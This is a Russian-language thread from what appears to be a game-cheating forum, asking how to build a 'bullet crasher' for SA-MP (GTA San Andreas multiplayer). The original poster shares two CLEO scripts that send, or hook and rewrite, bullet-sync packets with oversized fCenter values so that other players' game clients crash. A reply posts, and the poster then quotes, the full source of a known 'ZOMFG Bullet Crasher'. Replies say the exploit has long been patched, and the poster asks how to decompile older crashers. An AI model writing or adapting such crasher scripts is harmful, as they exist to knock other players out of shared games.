Помогите сделать bullet crasher или объяснить принцип его работы

Статус
В этой теме нельзя размещать новые ответы.

Gabriel__

Известный
Автор темы
Проверенный
411
181
Как я понимаю если отправлять большие значения в fcenter (2004318080.0 ) игроков по идее будет крашить. Но у меня не получается написал 2 скрипта. Первый отправляет bullet синхру с большим fCenter. Второй это hook. Перехватывает исходящую bullet синхру и переписывает fCenter (работает когда стреляешь). Может я что-то не так понимаю, объясните как работают современные крашеры. Коды этих скриптов я скину.
Первый крашер.
Код:
{$CLEO}
const
STATE =  0@
end
0000:
{$INCLUDE SAMP_AV}
0B34: samp register_client_command "cr" to_label @cmd

while true
wait 0
    if 0@ == 1
    then
    call @BulletSync 0
    018C: play_sound 1052 at 0.0 0.0 0.0
    wait 2@
    end
end



:cmd
if STATE == 0
then
0B35: samp 1@ = get_last_command_params
    if
    0AD4: 1@ = scan_string 1@ format "%d" 2@
    then
    STATE = 1
    0AF8: samp add_message_to_chat "{FFFF00}[Crasher] {FFFFFF}Включен" color -1
    else
    0AF8: samp add_message_to_chat "{FFFF00}[Crasher] {FFFFFF}Введите /cr [Задержка]" color -1
    SAMP.CmdRet()
    end
else
STATE = 0
0AF8: samp add_message_to_chat "{FFFF00}[Crasher] {FFFFFF}Выключен" color -1
end
samp.CmdRet()

:BulletSync
0AC8: 10@ = allocate_memory_size 40 // sizeof_stBulletData
0C0D: struct 10@ offset 0 size 1 = 1 // uint8_t        byteType;
0B2B: samp 11@ = get_player_id_by_actor_handle $PLAYER_ACTOR
0C0D: struct 10@ offset 1 size 2 = 11@ // uint16_t    sTargetID;

0C0D: struct 10@ offset 27 size 4 = 2004318080.0  // float        fCenter[3];
0C0D: struct 10@ offset 31 size 4 = 2004318080.0  // float        fCenter[3];
0C0D: struct 10@ offset 35 size 4 = 2004318080.0  // float        fCenter[3];

0470: 12@ = actor $PLAYER_ACTOR current_weapon

0C0D: struct 25@ offset 39 size 1 = 12@ // uint8_t        byteWeaponID;
Второй крашер с хуком.
Код:
{$CLEO}
0000:
{$INCLUDE SAMP_AV}
0BE2: raknet setup_outcoming_packet_hook @RPC
0B34: samp register_client_command "rew" to_label @cmd
0BDE: pause_thread 0

:cmd
if 15@ == 0
then
15@ = 1
print "Rewrite ~g~ON" 1000
else
15@ = 0
print "Rewrite ~r~OFF" 1000
end
samp.CmdRet()


:RPC
if 15@ == 1
jf @RPC_Ret
0BE5: raknet 31@  = get_hook_param 1
if
0039:   31@  == 206
jf @RPC_Ret
0BE5: raknet 30@  = get_hook_param 0
0AC8: 20@ = allocate_memory_size 40 
20@ = BitStream.GetDataPtr(30@) 

0C0D: struct 20@ offset 27 size 4 = 2004318080.0
0C0D: struct 20@ offset 31 size 4 = 2004318080.0
 0C0D: struct 20@ offset 35 size 4 = 2004318080.0
0AC9: free_allocated_memory 20@

:RPC_Ret
0BE0: raknet hook_ret 1
 

woksonal

Известный
Проверенный
268
154
сурс фипа
CLEO:
{$CLEO}
{$INCLUDE SF}
      
thread "BulletZOMFGCrasher"
0662: "Made by FYP and urShadow"
0662: "BlastHack.Net"
      
const
STATE = 0@
BUFFER = 1@
TIMER = 4@
      
KEYCOMB_1 = 66
KEYCOMB_2 = 67
      
DELAYVALUE = 1000 // ms
CRASHVALUE = 2004318080.0
      
sizeof_stBulletData = 39
end
      
STATE = 0
TIMER = 0
      
while not SAMP.Available()
       wait 1337
end
      
alloc BUFFER sizeof_stBulletData
      
while true
        
       wait 0
       if player.Defined(0)
       jf continue
       if and
           key_down KEYCOMB_1
           key_down KEYCOMB_2
       then
           0B12: STATE = STATE XOR 1
           if STATE == 1
           then print "~w~ZOMFG Bullet Crasher ~g~activated!~n~~w~urShadow~n~FYP~n~Сайт.Net" 1337
           else print "~w~ZOMFG Bullet Crasher ~r~deactivated!~n~~w~urShadow~n~FYP~n~Сайт.Net" 1337
           end
           while true
               wait 100
               if and
                   key_down KEYCOMB_1
                   key_down KEYCOMB_2
               jf break
           end
       end
        
       if STATE == 1
       then
           0A8D: 5@ = read_memory 0xB7CB84 size 4 virtual_protect 0 // global game timer
           0A8F: 6@ = 5@ - TIMER // int
           if 6@ > DELAYVALUE
           then
               gosub @bulletfreez
               0085: TIMER = 5@ // (int)
           end
       end
end
      
      
:bulletfreez
0C11: memset destination BUFFER value 0 size sizeof_stBulletData
0C0D: struct BUFFER offset 0 size 1 = 1// byteType
0B2B: samp 2@ = get_player_id_by_actor_handle $player_actor
0C0D: struct BUFFER offset 1 size 2 = 2@ // sTargetID
0C0D: struct BUFFER offset 27 size 4 = CRASHVALUE // fCenter
0C0D: struct BUFFER offset 31 size 4 = CRASHVALUE // fCenter
0C0D: struct BUFFER offset 35 size 4 = CRASHVALUE // fCenter
call @SendBulletData 1 BUFFER
return
      
:SendBulletData // 0@ = buffer
1@ = RakNet.NewBitStream()
RakNet.Write(1@, PACKET_BULLET_SYNC, BS_TYPE_BYTE, 0)
RakNet.Write(1@, 0@, BS_TYPE_ARRAY, sizeof_stBulletData)
RakNet.Send(1@, HIGH_PRIORITY, UNRELIABLE_SEQUENCED, 0)
ret 0

и буллет крашер пофиксили как не крути, при его использовании ты только добьешься этого в консоли сервера и все

[warning] Invalid shot data for player(%u). Player shoots self.
[warning] Invalid shot data for player(%u). Shot out of bounds.
[warning] Invalid shot data for player(%u). Offset out of bounds.
 
  • Нравится
Реакции: akka

Gabriel__

Известный
Автор темы
Проверенный
411
181
сурс фипа
CLEO:
{$CLEO}
{$INCLUDE SF}
     
thread "BulletZOMFGCrasher"
0662: "Made by FYP and urShadow"
0662: "BlastHack.Net"
     
const
STATE = 0@
BUFFER = 1@
TIMER = 4@
     
KEYCOMB_1 = 66
KEYCOMB_2 = 67
     
DELAYVALUE = 1000 // ms
CRASHVALUE = 2004318080.0
     
sizeof_stBulletData = 39
end
     
STATE = 0
TIMER = 0
     
while not SAMP.Available()
       wait 1337
end
     
alloc BUFFER sizeof_stBulletData
     
while true
       
       wait 0
       if player.Defined(0)
       jf continue
       if and
           key_down KEYCOMB_1
           key_down KEYCOMB_2
       then
           0B12: STATE = STATE XOR 1
           if STATE == 1
           then print "~w~ZOMFG Bullet Crasher ~g~activated!~n~~w~urShadow~n~FYP~n~Сайт.Net" 1337
           else print "~w~ZOMFG Bullet Crasher ~r~deactivated!~n~~w~urShadow~n~FYP~n~Сайт.Net" 1337
           end
           while true
               wait 100
               if and
                   key_down KEYCOMB_1
                   key_down KEYCOMB_2
               jf break
           end
       end
       
       if STATE == 1
       then
           0A8D: 5@ = read_memory 0xB7CB84 size 4 virtual_protect 0 // global game timer
           0A8F: 6@ = 5@ - TIMER // int
           if 6@ > DELAYVALUE
           then
               gosub @bulletfreez
               0085: TIMER = 5@ // (int)
           end
       end
end
     
     
:bulletfreez
0C11: memset destination BUFFER value 0 size sizeof_stBulletData
0C0D: struct BUFFER offset 0 size 1 = 1// byteType
0B2B: samp 2@ = get_player_id_by_actor_handle $player_actor
0C0D: struct BUFFER offset 1 size 2 = 2@ // sTargetID
0C0D: struct BUFFER offset 27 size 4 = CRASHVALUE // fCenter
0C0D: struct BUFFER offset 31 size 4 = CRASHVALUE // fCenter
0C0D: struct BUFFER offset 35 size 4 = CRASHVALUE // fCenter
call @SendBulletData 1 BUFFER
return
     
:SendBulletData // 0@ = buffer
1@ = RakNet.NewBitStream()
RakNet.Write(1@, PACKET_BULLET_SYNC, BS_TYPE_BYTE, 0)
RakNet.Write(1@, 0@, BS_TYPE_ARRAY, sizeof_stBulletData)
RakNet.Send(1@, HIGH_PRIORITY, UNRELIABLE_SEQUENCED, 0)
ret 0

и буллет крашер пофиксили как не крути, при его использовании ты только добьешься этого в консоли сервера и все

[warning] Invalid shot data for player(%u). Player shoots self.
[warning] Invalid shot data for player(%u). Shot out of bounds.
[warning] Invalid shot data for player(%u). Offset out of bounds.
У меня есть такой
 

0pc0d3R

Потрачен
550
269
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
он накрыт в самом сампе давным давно
 

0pc0d3R

Потрачен
550
269
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
А как работают другие крашеры вышедшие недавно например asi от 0x688 p3ti или aim crasher by opcod3r
ну я как бы и есть тот опкодер и крашер не мой я лишь модифицировал его работу для беспалевности :ROFLMAO: И это было давно, на 0.3z вроде бы. Забудь щас в паблике рабочих вообще нет.
 

0pc0d3R

Потрачен
550
269
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
А как работают другие крашеры вышедшие недавно например asi от 0x688 p3ti или aim crasher by opcod3r
тебе без толку эти знания, или ты хочешь на их примере попробовать эксперементы из синхрой?)) Поверь я тоже так ебался но в результате нихуя, это как угадать число из милиона. На скок я знаю крашеры находились случайно.
 

Gabriel__

Известный
Автор темы
Проверенный
411
181
ну я как бы и есть тот опкодер и крашер не мой я лишь модифицировал его работу для беспалевности :ROFLMAO: И это было давно, на 0.3z вроде бы. Забудь щас в паблике рабочих вообще нет.
Меня недавно несколько дней назад крашнули! Было это так сначала игроки зависли не игра потом с неба стали лететь пули сиджей на вайнвуде пляж санта мария
 

©Ded_Fedot

КГБ
2,139
1,261
Давным давно это было, на хороших серверах уже и не найдешь способ краша. А если и есть, то где то в привате
 

Kepllin_Kepll

Потрачен
54
5
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Давным давно это было, на хороших серверах уже и не найдешь способ краша. А если и есть, то где то в привате
Да и каршеры,скрипты от Ромелло в виде убийства машинной фиксят быстро и все больше и больше зажимают создание нового подобного скрипта.
 

Gabriel__

Известный
Автор темы
Проверенный
411
181
тебе без толку эти знания, или ты хочешь на их примере попробовать эксперементы из синхрой?)) Поверь я тоже так ебался но в результате нихуя, это как угадать число из милиона. На скок я знаю крашеры находились случайно.
Как раскриптовать старые крашеры ? Например тот от нико /crasher задержка
 
Статус
В этой теме нельзя размещать новые ответы.